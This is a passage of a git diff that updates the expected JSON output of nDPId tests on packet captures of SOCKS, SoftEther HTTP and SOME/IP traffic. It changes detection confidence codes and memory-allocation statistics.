+00694{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":46,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1386004312331,"flow_last_seen":1386004312384,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1770,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1386004317989,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53534,"dst_port":1080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SOCKS","breed":"Acceptable","category":"Web"}} 00665{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":46,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1386004317979,"flow_last_seen":1386004317989,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1763,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1386004317989,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53535,"dst_port":1080,"l4_proto":"tcp","ndpi": {"confidence": 
{"1":"Match by port"},"proto":"SOCKS","breed":"Acceptable","category":"Web"}} 00600{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":46,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1386004317979,"flow_last_seen":1386004317989,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1763,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1386004317989,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53535,"dst_port":1080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00567{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":46,"source":"socks-http-example.pcap","alias":"nDPId-test","packets-captured":46,"packets-processed":46,"total-skipped-flows":0,"total-l4-payload-len":5287,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":21,"global_ts_msec":1386004317989} @@ -27,9 +27,9 @@ ~~ total active/idle flows...: 3/3 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5879041 bytes -~~ total memory freed........: 5879041 bytes -~~ total allocations/frees...: 118171/118171 +~~ total memory allocated....: 6012675 bytes +~~ total memory freed........: 6012675 bytes +~~ total allocations/frees...: 120933/120933 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 474 chars ~~ json string max len.......: 699 chars diff --git a/test/results/softether-http.pcap.out b/test/results/softether-http.pcap.out index 68302bde7..42d42761a 100644 --- a/test/results/softether-http.pcap.out 
+++ b/test/results/softether-http.pcap.out 
@@ -4,7 +4,7 @@ 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"softether-http.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1642993710968,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1642993710968,"pkt":"eJS0JASgYDjgxTWgCABFAAA8GPRAAD8GkfDAqAJkgp5LLZKAAFAJq5FAAAAAAKAC+vCRBgAAAgQFtAQCCApgbIO7AAAAAAEDAwY="} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"softether-http.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1642993711225,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1642993711225,"pkt":"YDjgxTWgeJS0JASgCABFAAA8XxtAAHAGGsmCnkstwKgCZABQkoDyj0KZCauRQaASIAAzDwAAAgQFrAEDAwgEAggKBdAXMmBsg7s="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"softether-http.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1642993711226,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1642993711226,"pkt":"eJS0JASgYDjgxTWgCABFAAA0GPVAAD8GkffAqAJkgp5LLZKAAFAJq5FB8o9CmoAQA+yQ\/gAAAQEICmBshL0F0Bcy"} 
-00943{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"softether-http.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1642993710968,"flow_last_seen":1642993711226,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1112,"flow_tot_l4_payload_len":1112,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1642993711226,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"130.158.75.45","src_port":37504,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Softether","breed":"Acceptable","category":"VPN"},"http": {"hostname":"x0.x0.dev.open.servers.ddns.softether-network.net","url":"x0.x0.dev.open.servers.ddns.softether-network.net\/ddns\/ddns.aspx?v=9291257684825389030","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko\/20100101 Firefox\/29.0"}} +00943{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"softether-http.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1642993710968,"flow_last_seen":1642993711226,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1112,"flow_tot_l4_payload_len":1112,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1642993711226,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"130.158.75.45","src_port":37504,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Softether","breed":"Acceptable","category":"VPN"},"http": {"hostname":"x0.x0.dev.open.servers.ddns.softether-network.net","url":"x0.x0.dev.open.servers.ddns.softether-network.net\/ddns\/ddns.aspx?v=9291257684825389030","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko\/20100101 Firefox\/29.0"}} 
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"softether-http.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1642993710968,"flow_last_seen":1642993711226,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1112,"flow_tot_l4_payload_len":1112,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1642993711226,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"130.158.75.45","src_port":37504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00559{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":4,"source":"softether-http.pcap","alias":"nDPId-test","packets-captured":4,"packets-processed":4,"total-skipped-flows":0,"total-l4-payload-len":1112,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1642993711226} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869765 bytes -~~ total memory freed........: 5869765 bytes -~~ total allocations/frees...: 118122/118122 +~~ total memory allocated....: 6003399 bytes +~~ total memory freed........: 6003399 bytes +~~ total allocations/frees...: 120884/120884 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 470 chars ~~ json string max len.......: 948 chars diff --git a/test/results/someip-tp.pcap.out b/test/results/someip-tp.pcap.out index 6819d0fea..51160f1ca 100644 --- a/test/results/someip-tp.pcap.out +++ b/test/results/someip-tp.pcap.out 
@@ -2,10 +2,10 @@ 00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"someip-tp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1433332443506} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"someip-tp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1433332443506,"flow_last_seen":1433332443506,"flow_idle_time":200000,"flow_min_l4_payload_len":1412,"flow_max_l4_payload_len":1412,"flow_tot_l4_payload_len":1412,"flow_avg_l4_payload_len":1412,"midstream":0,"thread_ts_msec":1433332443506,"l3_proto":"ip4","src_ip":"10.0.1.207","dst_ip":"10.0.1.1","src_port":56772,"dst_port":18193,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02350{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"someip-tp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1433332443506,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1454,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1454,"pkt_l4_len":1420,"thread_ts_msec":1433332443506,"pkt":"bAAAAAAOdAAAAADhCABFAAWgNUcAAIARAAAKAAHPCgABAd3ERxEFjBxtAQEACQAABXwAAAAFAQEgAAAAAAEAADAAAAECAwQFBgcICQoLDA0ODxAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc4OTo7PD0+P0BBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWltcXV5fYGFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6e3x9fn+AgYKDhIWGh4iJiouMjY6PkJGSk5SVlpeYmZqbnJ2en6ChoqOkpaanqKmqq6ytrq+wsbKztLW2t7i5uru8vb6\/wMHCw8TFxsfIycrLzM3Oz9DR0tPU1dbX2Nna29zd3t\/g4eLj5OXm5+jp6uvs7e7v8PHy8\/T19vf4+fr7\/P3+\/wABAgMEBQYHCAkKCwwNDg8QERITFBUWFxgZGhscHR4fICEiIyQlJicoKSorLC0uLzAxMjM0NTY3ODk6Ozw9Pj9AQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpbXF1eX2BhYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ent8fX5\/gIGCg4SFhoeIiYqLjI2Oj5CRkpOUlZaXmJmam5ydnp+goaKjpKWmp6ipqqusra6vsLGys7S1tre4ubq7vL2+v8DBwsPExcbHyMnKy8zNzs\/Q0dLT1NXW19jZ2tvc3d7f4OHi4+Tl5ufo6err7O3u7\/Dx8vP09fb3+Pn6+\/z9\/v8AAQIDBAUGBwgJCgsMDQ4PEBESExQVFhcYGRobHB0eHyAhIiMkJSYnKCkqKywtLi8wMTIzNDU2Nzg5Ojs8PT4\/QEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaW1xdXl9gYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXp7fH1+f4CBgoOEhYaHiImKi4yNjo+QkZKTlJWWl5iZmpucnZ6foKGio6SlpqeoqaqrrK2ur7CxsrO0tba3uLm6u7y9vr\/AwcLDxMXGx8jJysvMzc7P0NHS09TV1tfY2drb3N3e3+Dh4uPk5ebn6Onq6+zt7u\/w8fLz9PX29\/j5+vv8\/f7\/AAECAwQFBgcICQoLDA0ODxAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc4OTo7PD0+P0BBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWltcXV5fYGFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6e3x9fn+AgYKDhIWGh4iJiouMjY6PkJGSk5SVlpeYmZqbnJ2en6ChoqOkpaanqKmqq6ytrq+wsbKztLW2t7i5uru8vb6\/wMHCw8TFxsfIycrLzM3Oz9DR0tPU1dbX2Nna29zd3t\/g4eLj5OXm5+jp6uvs7e7v8PHy8\/T19vf4+fr7\/P3+\/wABAgMEBQYHCAkKCwwNDg8QERITFBUWFxgZGhscHR4fICEiIyQlJicoKSorLC0uLzAxMjM0NTY3ODk6Ozw9Pj9AQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpbXF1eX2BhYmNkZWZnaG
lqa2xtbm9wcXJzdHV2d3h5ent8fX5\/gIGCg4SFhoeIiYqLjI2Oj5CRkpOUlZaXmJmam5ydnp+goaKjpKWmp6ipqqusra6vsLGys7S1tre4ubq7vL2+v8DBwsPExcbHyMnKy8zNzs\/Q0dLT1NXW19jZ2tvc3d7f4OHi4+Tl5ufo6err7O3u7\/Dx8vP09fb3+Pn6+\/z9\/v8AAQIDBAUGBwgJCgsMDQ4PEBESExQVFhcYGRobHB0eHyAhIiMkJSYnKCkqKywtLi8wMTIzNDU2Nzg5Ojs8PT4\/QEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaW1xdXl9gYWJjZGVmZ2hpams="} -00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"someip-tp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1433332443506,"flow_last_seen":1433332443506,"flow_idle_time":200000,"flow_min_l4_payload_len":1412,"flow_max_l4_payload_len":1412,"flow_tot_l4_payload_len":1412,"flow_avg_l4_payload_len":1412,"midstream":0,"thread_ts_msec":1433332443506,"l3_proto":"ip4","src_ip":"10.0.1.207","dst_ip":"10.0.1.1","src_port":56772,"dst_port":18193,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"SOMEIP","breed":"Acceptable","category":"RPC"}} +00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"someip-tp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1433332443506,"flow_last_seen":1433332443506,"flow_idle_time":200000,"flow_min_l4_payload_len":1412,"flow_max_l4_payload_len":1412,"flow_tot_l4_payload_len":1412,"flow_avg_l4_payload_len":1412,"midstream":0,"thread_ts_msec":1433332443506,"l3_proto":"ip4","src_ip":"10.0.1.207","dst_ip":"10.0.1.1","src_port":56772,"dst_port":18193,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"SOMEIP","breed":"Acceptable","category":"RPC"}} 
02351{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"someip-tp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1433332443519,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1454,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1454,"pkt_l4_len":1420,"thread_ts_msec":1433332443519,"pkt":"bAAAAAAOdAAAAADhCABFAAWgNUgAAIARAAAKAAHPCgABAd3ERxEFjBxtAQEACQAABXwAAAAFAQEgAAAABXFsbW5vcHFyc3R1dnd4eXp7fH1+f4CBgoOEhYaHiImKi4yNjo+QkZKTlJWWl5iZmpucnZ6foKGio6SlpqeoqaqrrK2ur7CxsrO0tba3uLm6u7y9vr\/AwcLDxMXGx8jJysvMzc7P0NHS09TV1tfY2drb3N3e3+Dh4uPk5ebn6Onq6+zt7u\/w8fLz9PX29\/j5+vv8\/f7\/AAECAwQFBgcICQoLDA0ODxAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc4OTo7PD0+P0BBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWltcXV5fYGFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6e3x9fn+AgYKDhIWGh4iJiouMjY6PkJGSk5SVlpeYmZqbnJ2en6ChoqOkpaanqKmqq6ytrq+wsbKztLW2t7i5uru8vb6\/wMHCw8TFxsfIycrLzM3Oz9DR0tPU1dbX2Nna29zd3t\/g4eLj5OXm5+jp6uvs7e7v8PHy8\/T19vf4+fr7\/P3+\/wABAgMEBQYHCAkKCwwNDg8QERITFBUWFxgZGhscHR4fICEiIyQlJicoKSorLC0uLzAxMjM0NTY3ODk6Ozw9Pj9AQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpbXF1eX2BhYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ent8fX5\/gIGCg4SFhoeIiYqLjI2Oj5CRkpOUlZaXmJmam5ydnp+goaKjpKWmp6ipqqusra6vsLGys7S1tre4ubq7vL2+v8DBwsPExcbHyMnKy8zNzs\/Q0dLT1NXW19jZ2tvc3d7f4OHi4+Tl5ufo6err7O3u7\/Dx8vP09fb3+Pn6+\/z9\/v8AAQIDBAUGBwgJCgsMDQ4PEBESExQVFhcYGRobHB0eHyAhIiMkJSYnKCkqKywtLi8wMTIzNDU2Nzg5Ojs8PT4\/QEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaW1xdXl9gYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXp7fH1+f4CBgoOEhYaHiImKi4yNjo+QkZKTlJWWl5iZmpucnZ6foKGio6SlpqeoqaqrrK2ur7CxsrO0tba3uLm6u7y9vr\/AwcLDxMXGx8jJysvMzc7P0NHS09TV1tfY2drb3N3e3+Dh4uPk5ebn6Onq6+zt7u\/w8fLz9PX29\/j5+vv8\/f7\/AAECAwQFBgcICQoLDA0ODxAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc4OTo7PD0+P0BBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWltcXV5fYGFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6e3x9fn+AgYKDhIWGh4iJiouMjY6PkJGSk5SVlpeYmZqbnJ2en6ChoqOkpaanqKmqq6ytrq+wsbKztLW2t7i5uru8vb6\/wMHCw8TFxsfIycrLzM3Oz9DR0tPU1dbX2
Nna29zd3t\/g4eLj5OXm5+jp6uvs7e7v8PHy8\/T19vf4+fr7\/P3+\/wABAgMEBQYHCAkKCwwNDg8QERITFBUWFxgZGhscHR4fICEiIyQlJicoKSorLC0uLzAxMjM0NTY3ODk6Ozw9Pj9AQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpbXF1eX2BhYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ent8fX5\/gIGCg4SFhoeIiYqLjI2Oj5CRkpOUlZaXmJmam5ydnp+goaKjpKWmp6ipqqusra6vsLGys7S1tre4ubq7vL2+v8DBwsPExcbHyMnKy8zNzs\/Q0dLT1NXW19jZ2ts="} 02353{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"someip-tp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1433332443524,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1454,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1454,"pkt_l4_len":1420,"thread_ts_msec":1433332443524,"pkt":"bAAAAAAOdAAAAADhCABFAAWgNUkAAIARAAAKAAHPCgABAd3ERxEFjBxtAQEACQAABXwAAAAFAQEgAAAACuHc3d7f4OHi4+Tl5ufo6err7O3u7\/Dx8vP09fb3+Pn6+\/z9\/v8AAQIDBAUGBwgJCgsMDQ4PEBESExQVFhcYGRobHB0eHyAhIiMkJSYnKCkqKywtLi8wMTIzNDU2Nzg5Ojs8PT4\/QEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaW1xdXl9gYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXp7fH1+f4CBgoOEhYaHiImKi4yNjo+QkZKTlJWWl5iZmpucnZ6foKGio6SlpqeoqaqrrK2ur7CxsrO0tba3uLm6u7y9vr\/AwcLDxMXGx8jJysvMzc7P0NHS09TV1tfY2drb3N3e3+Dh4uPk5ebn6Onq6+zt7u\/w8fLz9PX29\/j5+vv8\/f7\/AAECAwQFBgcICQoLDA0ODxAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc4OTo7PD0+P0BBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWltcXV5fYGFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6e3x9fn+AgYKDhIWGh4iJiouMjY6PkJGSk5SVlpeYmZqbnJ2en6ChoqOkpaanqKmqq6ytrq+wsbKztLW2t7i5uru8vb6\/wMHCw8TFxsfIycrLzM3Oz9DR0tPU1dbX2Nna29zd3t\/g4eLj5OXm5+jp6uvs7e7v8PHy8\/T19vf4+fr7\/P3+\/wABAgMEBQYHCAkKCwwNDg8QERITFBUWFxgZGhscHR4fICEiIyQlJicoKSorLC0uLzAxMjM0NTY3ODk6Ozw9Pj9AQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpbXF1eX2BhYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ent8fX5\/gIGCg4SFhoeIiYqLjI2Oj5CRkpOUlZaXmJmam5ydnp+goaKjpKWmp6ipqqusra6vsLGys7S1tre4ubq7vL2+v8DBwsPExcbHyMnKy8zNzs\/Q0dLT1NXW19jZ2tvc3d7f4OHi4+Tl5ufo6err7O3u7\/Dx8vP09fb3+Pn6+\/z9\/v8AAQIDBAUGBwgJCgsMDQ4PEBESExQVFhcYGRobHB0eHyAhIiMkJSYnKCkqKywtLi8wMTIzNDU2Nzg5Ojs8PT4\
/QEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaW1xdXl9gYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXp7fH1+f4CBgoOEhYaHiImKi4yNjo+QkZKTlJWWl5iZmpucnZ6foKGio6SlpqeoqaqrrK2ur7CxsrO0tba3uLm6u7y9vr\/AwcLDxMXGx8jJysvMzc7P0NHS09TV1tfY2drb3N3e3+Dh4uPk5ebn6Onq6+zt7u\/w8fLz9PX29\/j5+vv8\/f7\/AAECAwQFBgcICQoLDA0ODxAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc4OTo7PD0+P0BBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWltcXV5fYGFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6e3x9fn+AgYKDhIWGh4iJiouMjY6PkJGSk5SVlpeYmZqbnJ2en6ChoqOkpaanqKmqq6ytrq+wsbKztLW2t7i5uru8vb6\/wMHCw8TFxsfIycrLzM3Oz9DR0tPU1dbX2Nna29zd3t\/g4eLj5OXm5+jp6uvs7e7v8PHy8\/T19vf4+fr7\/P3+\/wABAgMEBQYHCAkKCwwNDg8QERITFBUWFxgZGhscHR4fICEiIyQlJicoKSorLC0uLzAxMjM0NTY3ODk6Ozw9Pj9AQUJDREVGR0hJSks="} -00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9,"source":"someip-tp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1433332443506,"flow_last_seen":1433332443605,"flow_idle_time":200000,"flow_min_l4_payload_len":1176,"flow_max_l4_payload_len":1412,"flow_tot_l4_payload_len":12472,"flow_avg_l4_payload_len":1385,"midstream":0,"thread_ts_msec":1433332443605,"l3_proto":"ip4","src_ip":"10.0.1.207","dst_ip":"10.0.1.1","src_port":56772,"dst_port":18193,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"SOMEIP","breed":"Acceptable","category":"RPC"}} 
+00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9,"source":"someip-tp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1433332443506,"flow_last_seen":1433332443605,"flow_idle_time":200000,"flow_min_l4_payload_len":1176,"flow_max_l4_payload_len":1412,"flow_tot_l4_payload_len":12472,"flow_avg_l4_payload_len":1385,"midstream":0,"thread_ts_msec":1433332443605,"l3_proto":"ip4","src_ip":"10.0.1.207","dst_ip":"10.0.1.1","src_port":56772,"dst_port":18193,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"SOMEIP","breed":"Acceptable","category":"RPC"}} 00555{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":9,"source":"someip-tp.pcap","alias":"nDPId-test","packets-captured":9,"packets-processed":9,"total-skipped-flows":0,"total-l4-payload-len":12472,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1433332443605} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 9/9 
@@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869704 bytes -~~ total memory freed........: 5869704 bytes -~~ total allocations/frees...: 118123/118123 +~~ total memory allocated....: 6003338 bytes +~~ total memory freed........: 6003338 bytes +~~ total allocations/frees...: 120885/120885 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 465 chars ~~ json string max len.......: 2358 chars diff --git a/test/results/someip-udp-method-call.pcapng.out b/test/results/someip-udp-method-call.pcapng.out index 56f3414a1..088e214ae 100644 --- a/test/results/someip-udp-method-call.pcapng.out +++ b/test/results/someip-udp-method-call.pcapng.out 
@@ -2,13 +2,13 @@ 00564{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"someip-udp-method-call.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1502789275686} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"someip-udp-method-call.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1502789275686,"flow_last_seen":1502789275686,"flow_idle_time":200000,"flow_min_l4_payload_len":328,"flow_max_l4_payload_len":328,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":328,"midstream":0,"thread_ts_msec":1502789275686,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"224.0.0.1","src_port":49190,"dst_port":49190,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
